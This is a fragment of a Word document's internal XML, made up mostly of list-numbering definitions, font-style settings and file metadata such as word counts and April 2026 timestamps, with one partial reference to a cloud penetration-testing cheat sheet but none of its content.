  <w:num w:numId="427" w16cid:durableId="1721322160">
    <w:abstractNumId w:val="112"/>
  </w:num>
  <w:num w:numId="428" w16cid:durableId="1825312954">
    <w:abstractNumId w:val="536"/>
  </w:num>
  <w:num w:numId="429" w16cid:durableId="1450130236">
    <w:abstractNumId w:val="490"/>
  </w:num>
  <w:num w:numId="430" w16cid:durableId="8606564">
    <w:abstractNumId w:val="172"/>
  </w:num>
  <w:num w:numId="431" w16cid:durableId="1104836943">
    <w:abstractNumId w:val="216"/>
  </w:num>
  <w:num w:numId="432" w16cid:durableId="299463050">
    <w:abstractNumId w:val="372"/>
  </w:num>
  <w:num w:numId="433" w16cid:durableId="2042121377">
    <w:abstractNumId w:val="75"/>
  </w:num>
  <w:num w:numId="434" w16cid:durableId="1338653688">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="435" w16cid:durableId="2035694460">
    <w:abstractNumId w:val="355"/>
  </w:num>
  <w:num w:numId="436" w16cid:durableId="321352145">
    <w:abstractNumId w:val="337"/>
  </w:num>
  <w:num w:numId="437" w16cid:durableId="473959692">
    <w:abstractNumId w:val="177"/>
  </w:num>
  <w:num w:numId="438" w16cid:durableId="309484556">
    <w:abstractNumId w:val="290"/>
  </w:num>
  <w:num w:numId="439" w16cid:durableId="875969650">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="440" w16cid:durableId="1837844120">
    <w:abstractNumId w:val="136"/>
  </w:num>
  <w:num w:numId="441" w16cid:durableId="160391710">
    <w:abstractNumId w:val="562"/>
  </w:num>
  <w:num w:numId="442" w16cid:durableId="414597715">
    <w:abstractNumId w:val="471"/>
  </w:num>
  <w:num w:numId="443" w16cid:durableId="244262077">
    <w:abstractNumId w:val="213"/>
  </w:num>
  <w:num w:numId="444" w16cid:durableId="802843533">
    <w:abstractNumId w:val="163"/>
  </w:num>
  <w:num w:numId="445" w16cid:durableId="1221407493">
    <w:abstractNumId w:val="364"/>
  </w:num>
  <w:num w:numId="446" w16cid:durableId="8528339">
    <w:abstractNumId w:val="58"/>
  </w:num>
  <w:num w:numId="447" w16cid:durableId="2027974394">
    <w:abstractNumId w:val="444"/>
  </w:num>
  <w:num w:numId="448" w16cid:durableId="1822307320">
    <w:abstractNumId w:val="205"/>
  </w:num>
  <w:num w:numId="449" w16cid:durableId="753432511">
    <w:abstractNumId w:val="461"/>
  </w:num>
  <w:num w:numId="450" w16cid:durableId="1189952809">
    <w:abstractNumId w:val="131"/>
  </w:num>
  <w:num w:numId="451" w16cid:durableId="904101755">
    <w:abstractNumId w:val="76"/>
  </w:num>
  <w:num w:numId="452" w16cid:durableId="95565767">
    <w:abstractNumId w:val="430"/>
  </w:num>
  <w:num w:numId="453" w16cid:durableId="799686177">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="454" w16cid:durableId="700670327">
    <w:abstractNumId w:val="263"/>
  </w:num>
  <w:num w:numId="455" w16cid:durableId="1033075895">
    <w:abstractNumId w:val="335"/>
  </w:num>
  <w:num w:numId="456" w16cid:durableId="142160090">
    <w:abstractNumId w:val="167"/>
  </w:num>
  <w:num w:numId="457" w16cid:durableId="57677719">
    <w:abstractNumId w:val="336"/>
  </w:num>
  <w:num w:numId="458" w16cid:durableId="1549799894">
    <w:abstractNumId w:val="512"/>
  </w:num>
  <w:num w:numId="459" w16cid:durableId="1428960389">
    <w:abstractNumId w:val="497"/>
  </w:num>
  <w:num w:numId="460" w16cid:durableId="1015039075">
    <w:abstractNumId w:val="138"/>
  </w:num>
  <w:num w:numId="461" w16cid:durableId="1569419963">
    <w:abstractNumId w:val="258"/>
  </w:num>
  <w:num w:numId="462" w16cid:durableId="1856962856">
    <w:abstractNumId w:val="358"/>
  </w:num>
  <w:num w:numId="463" w16cid:durableId="1619533641">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="464" w16cid:durableId="2131581481">
    <w:abstractNumId w:val="560"/>
  </w:num>
  <w:num w:numId="465" w16cid:durableId="1759476565">
    <w:abstractNumId w:val="117"/>
  </w:num>
  <w:num w:numId="466" w16cid:durableId="1710687164">
    <w:abstractNumId w:val="406"/>
  </w:num>
  <w:num w:numId="467" w16cid:durableId="1533152066">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="468" w16cid:durableId="1460028344">
    <w:abstractNumId w:val="145"/>
  </w:num>
  <w:num w:numId="469" w16cid:durableId="1464035959">
    <w:abstractNumId w:val="259"/>
  </w:num>
  <w:num w:numId="470" w16cid:durableId="537207092">
    <w:abstractNumId w:val="227"/>
  </w:num>
  <w:num w:numId="471" w16cid:durableId="816798243">
    <w:abstractNumId w:val="518"/>
  </w:num>
  <w:num w:numId="472" w16cid:durableId="1052581065">
    <w:abstractNumId w:val="70"/>
  </w:num>
  <w:num w:numId="473" w16cid:durableId="1388215168">
    <w:abstractNumId w:val="539"/>
  </w:num>
  <w:num w:numId="474" w16cid:durableId="1241407484">
    <w:abstractNumId w:val="171"/>
  </w:num>
  <w:num w:numId="475" w16cid:durableId="412775336">
    <w:abstractNumId w:val="279"/>
  </w:num>
  <w:num w:numId="476" w16cid:durableId="693849839">
    <w:abstractNumId w:val="472"/>
  </w:num>
  <w:num w:numId="477" w16cid:durableId="1310788478">
    <w:abstractNumId w:val="396"/>
  </w:num>
  <w:num w:numId="478" w16cid:durableId="1310595142">
    <w:abstractNumId w:val="120"/>
  </w:num>
  <w:num w:numId="479" w16cid:durableId="1840466923">
    <w:abstractNumId w:val="455"/>
  </w:num>
  <w:num w:numId="480" w16cid:durableId="1999765852">
    <w:abstractNumId w:val="170"/>
  </w:num>
  <w:num w:numId="481" w16cid:durableId="406000175">
    <w:abstractNumId w:val="343"/>
  </w:num>
  <w:num w:numId="482" w16cid:durableId="1287420821">
    <w:abstractNumId w:val="408"/>
  </w:num>
  <w:num w:numId="483" w16cid:durableId="714043008">
    <w:abstractNumId w:val="334"/>
  </w:num>
  <w:num w:numId="484" w16cid:durableId="1873878959">
    <w:abstractNumId w:val="487"/>
  </w:num>
  <w:num w:numId="485" w16cid:durableId="1927761811">
    <w:abstractNumId w:val="307"/>
  </w:num>
  <w:num w:numId="486" w16cid:durableId="1101221330">
    <w:abstractNumId w:val="493"/>
  </w:num>
  <w:num w:numId="487" w16cid:durableId="464323330">
    <w:abstractNumId w:val="270"/>
  </w:num>
  <w:num w:numId="488" w16cid:durableId="1952590631">
    <w:abstractNumId w:val="140"/>
  </w:num>
  <w:num w:numId="489" w16cid:durableId="1620185134">
    <w:abstractNumId w:val="460"/>
  </w:num>
  <w:num w:numId="490" w16cid:durableId="1226915386">
    <w:abstractNumId w:val="476"/>
  </w:num>
  <w:num w:numId="491" w16cid:durableId="1523669267">
    <w:abstractNumId w:val="533"/>
  </w:num>
  <w:num w:numId="492" w16cid:durableId="1679116638">
    <w:abstractNumId w:val="538"/>
  </w:num>
  <w:num w:numId="493" w16cid:durableId="1498615407">
    <w:abstractNumId w:val="427"/>
  </w:num>
  <w:num w:numId="494" w16cid:durableId="1581983909">
    <w:abstractNumId w:val="447"/>
  </w:num>
  <w:num w:numId="495" w16cid:durableId="1739134371">
    <w:abstractNumId w:val="318"/>
  </w:num>
  <w:num w:numId="496" w16cid:durableId="111286961">
    <w:abstractNumId w:val="215"/>
  </w:num>
  <w:num w:numId="497" w16cid:durableId="502744414">
    <w:abstractNumId w:val="281"/>
  </w:num>
  <w:num w:numId="498" w16cid:durableId="137841966">
    <w:abstractNumId w:val="469"/>
  </w:num>
  <w:num w:numId="499" w16cid:durableId="678384258">
    <w:abstractNumId w:val="193"/>
  </w:num>
  <w:num w:numId="500" w16cid:durableId="559168303">
    <w:abstractNumId w:val="77"/>
  </w:num>
  <w:num w:numId="501" w16cid:durableId="2012440841">
    <w:abstractNumId w:val="435"/>
  </w:num>
  <w:num w:numId="502" w16cid:durableId="1335842851">
    <w:abstractNumId w:val="282"/>
  </w:num>
  <w:num w:numId="503" w16cid:durableId="1533961848">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="504" w16cid:durableId="1836994280">
    <w:abstractNumId w:val="407"/>
  </w:num>
  <w:num w:numId="505" w16cid:durableId="2047489156">
    <w:abstractNumId w:val="405"/>
  </w:num>
  <w:num w:numId="506" w16cid:durableId="614755562">
    <w:abstractNumId w:val="484"/>
  </w:num>
  <w:num w:numId="507" w16cid:durableId="1015112834">
    <w:abstractNumId w:val="468"/>
  </w:num>
  <w:num w:numId="508" w16cid:durableId="2119794173">
    <w:abstractNumId w:val="113"/>
  </w:num>
  <w:num w:numId="509" w16cid:durableId="278804600">
    <w:abstractNumId w:val="59"/>
  </w:num>
  <w:num w:numId="510" w16cid:durableId="1854803207">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="511" w16cid:durableId="358816862">
    <w:abstractNumId w:val="454"/>
  </w:num>
  <w:num w:numId="512" w16cid:durableId="645092815">
    <w:abstractNumId w:val="525"/>
  </w:num>
  <w:num w:numId="513" w16cid:durableId="209610707">
    <w:abstractNumId w:val="274"/>
  </w:num>
  <w:num w:numId="514" w16cid:durableId="317926606">
    <w:abstractNumId w:val="347"/>
  </w:num>
  <w:num w:numId="515" w16cid:durableId="1409882743">
    <w:abstractNumId w:val="63"/>
  </w:num>
  <w:num w:numId="516" w16cid:durableId="685910377">
    <w:abstractNumId w:val="220"/>
  </w:num>
  <w:num w:numId="517" w16cid:durableId="1355378414">
    <w:abstractNumId w:val="425"/>
  </w:num>
  <w:num w:numId="518" w16cid:durableId="1717852826">
    <w:abstractNumId w:val="356"/>
  </w:num>
  <w:num w:numId="519" w16cid:durableId="2033992887">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="520" w16cid:durableId="1421099088">
    <w:abstractNumId w:val="448"/>
  </w:num>
  <w:num w:numId="521" w16cid:durableId="1443528151">
    <w:abstractNumId w:val="520"/>
  </w:num>
  <w:num w:numId="522" w16cid:durableId="1127577475">
    <w:abstractNumId w:val="275"/>
  </w:num>
  <w:num w:numId="523" w16cid:durableId="313341769">
    <w:abstractNumId w:val="125"/>
  </w:num>
  <w:num w:numId="524" w16cid:durableId="798454463">
    <w:abstractNumId w:val="196"/>
  </w:num>
  <w:num w:numId="525" w16cid:durableId="1194688166">
    <w:abstractNumId w:val="413"/>
  </w:num>
  <w:num w:numId="526" w16cid:durableId="1318193512">
    <w:abstractNumId w:val="554"/>
  </w:num>
  <w:num w:numId="527" w16cid:durableId="859930395">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="528" w16cid:durableId="1864316428">
    <w:abstractNumId w:val="542"/>
  </w:num>
  <w:num w:numId="529" w16cid:durableId="615992287">
    <w:abstractNumId w:val="241"/>
  </w:num>
  <w:num w:numId="530" w16cid:durableId="225452344">
    <w:abstractNumId w:val="523"/>
  </w:num>
  <w:num w:numId="531" w16cid:durableId="1918243961">
    <w:abstractNumId w:val="83"/>
  </w:num>
  <w:num w:numId="532" w16cid:durableId="995299402">
    <w:abstractNumId w:val="165"/>
  </w:num>
  <w:num w:numId="533" w16cid:durableId="425424049">
    <w:abstractNumId w:val="453"/>
  </w:num>
  <w:num w:numId="534" w16cid:durableId="695883430">
    <w:abstractNumId w:val="564"/>
  </w:num>
  <w:num w:numId="535" w16cid:durableId="176696177">
    <w:abstractNumId w:val="418"/>
  </w:num>
  <w:num w:numId="536" w16cid:durableId="1305701905">
    <w:abstractNumId w:val="342"/>
  </w:num>
  <w:num w:numId="537" w16cid:durableId="322511939">
    <w:abstractNumId w:val="367"/>
  </w:num>
  <w:num w:numId="538" w16cid:durableId="2125341823">
    <w:abstractNumId w:val="388"/>
  </w:num>
  <w:num w:numId="539" w16cid:durableId="80378286">
    <w:abstractNumId w:val="323"/>
  </w:num>
  <w:num w:numId="540" w16cid:durableId="856893182">
    <w:abstractNumId w:val="339"/>
  </w:num>
  <w:num w:numId="541" w16cid:durableId="416026046">
    <w:abstractNumId w:val="56"/>
  </w:num>
  <w:num w:numId="542" w16cid:durableId="756828973">
    <w:abstractNumId w:val="421"/>
  </w:num>
  <w:num w:numId="543" w16cid:durableId="1389378928">
    <w:abstractNumId w:val="432"/>
  </w:num>
  <w:num w:numId="544" w16cid:durableId="1132744327">
    <w:abstractNumId w:val="214"/>
  </w:num>
  <w:num w:numId="545" w16cid:durableId="350571952">
    <w:abstractNumId w:val="383"/>
  </w:num>
  <w:num w:numId="546" w16cid:durableId="1096099378">
    <w:abstractNumId w:val="116"/>
  </w:num>
  <w:num w:numId="547" w16cid:durableId="995955332">
    <w:abstractNumId w:val="540"/>
  </w:num>
  <w:num w:numId="548" w16cid:durableId="946498999">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="549" w16cid:durableId="1782341385">
    <w:abstractNumId w:val="439"/>
  </w:num>
  <w:num w:numId="550" w16cid:durableId="110247884">
    <w:abstractNumId w:val="331"/>
  </w:num>
  <w:num w:numId="551" w16cid:durableId="195430824">
    <w:abstractNumId w:val="164"/>
  </w:num>
  <w:num w:numId="552" w16cid:durableId="2113813203">
    <w:abstractNumId w:val="223"/>
  </w:num>
  <w:num w:numId="553" w16cid:durableId="1403288488">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="554" w16cid:durableId="1525633298">
    <w:abstractNumId w:val="526"/>
  </w:num>
  <w:num w:numId="555" w16cid:durableId="701982010">
    <w:abstractNumId w:val="377"/>
  </w:num>
  <w:num w:numId="556" w16cid:durableId="611209417">
    <w:abstractNumId w:val="280"/>
  </w:num>
  <w:num w:numId="557" w16cid:durableId="774448934">
    <w:abstractNumId w:val="499"/>
  </w:num>
  <w:num w:numId="558" w16cid:durableId="1357462201">
    <w:abstractNumId w:val="256"/>
  </w:num>
  <w:num w:numId="559" w16cid:durableId="830177231">
    <w:abstractNumId w:val="73"/>
  </w:num>
  <w:num w:numId="560" w16cid:durableId="1825006913">
    <w:abstractNumId w:val="501"/>
  </w:num>
  <w:num w:numId="561" w16cid:durableId="2144499891">
    <w:abstractNumId w:val="219"/>
  </w:num>
  <w:num w:numId="562" w16cid:durableId="245454577">
    <w:abstractNumId w:val="189"/>
  </w:num>
  <w:num w:numId="563" w16cid:durableId="693925139">
    <w:abstractNumId w:val="203"/>
  </w:num>
  <w:num w:numId="564" w16cid:durableId="228347898">
    <w:abstractNumId w:val="162"/>
  </w:num>
  <w:num w:numId="565" w16cid:durableId="82916496">
    <w:abstractNumId w:val="470"/>
  </w:num>
  <w:num w:numId="566" w16cid:durableId="711535680">
    <w:abstractNumId w:val="402"/>
  </w:num>
  <w:num w:numId="567" w16cid:durableId="946624127">
    <w:abstractNumId w:val="338"/>
  </w:num>
  <w:num w:numId="568" w16cid:durableId="1635333399">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="569" w16cid:durableId="1755859945">
    <w:abstractNumId w:val="507"/>
  </w:num>
  <w:num w:numId="570" w16cid:durableId="277302119">
    <w:abstractNumId w:val="5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C5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453E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265C5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6E40"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1576F178-BC29-412B-922A-CB73AA19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C5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C5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C5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C5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C5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C5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26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C5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F2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C5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265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5C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265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5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5C5"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Segoe UI"/>
      <w:kern w:val="0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5C5"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Segoe UI"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0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F26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fthack/CloudPentestCheatshe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5178</Words>
  <Characters>29519</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>245</Lines>
  <Paragraphs>69</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>34628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2026-04-06T05:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-06T11:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>